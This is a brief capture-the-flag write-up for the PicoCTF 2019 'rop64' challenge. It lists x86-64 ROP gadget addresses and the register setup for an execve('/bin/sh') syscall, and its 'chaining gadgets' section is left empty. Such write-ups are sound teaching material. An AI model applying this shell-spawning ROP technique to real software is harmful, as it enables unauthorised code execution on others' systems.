ROP64 — PicoCTF2019

If you read my previous writeup about rop32 then this one should be easy for you, i just need to remind you about the registers before execute syscall

rax == 0x3b (59 in dec)
rdi == point to address contain ‘/bin/sh’
rsi == NULL
rdx == NULL

now we need to find all the suitable gadgets to chain

### write-what-where gadget

i’m deciding use rsi to store the address of writable section (likewise i’m using .data section)

0x00000000004100d3 : pop rsi ; ret
0x00000000004156f4 : pop rax ; ret
0x000000000047f561 : mov qword ptr [rsi], rax ; ret

###initiate syscall gadgets (modify rax)

0x0000000000444c50 : xor rax, rax ; ret
0x00000000004749c0 : add rax, 1 ; ret

###initiate syscall argument gadgets (null rsi, rdx)

0x00000000004499b5 : pop rdx ; ret
0x00000000004100d3 : pop rsi ; ret
0x0000000000400686 : pop rdi ; ret

###syscall gadget

0x000000000040123c : syscall

###chaining gadgets

happy hacking !!!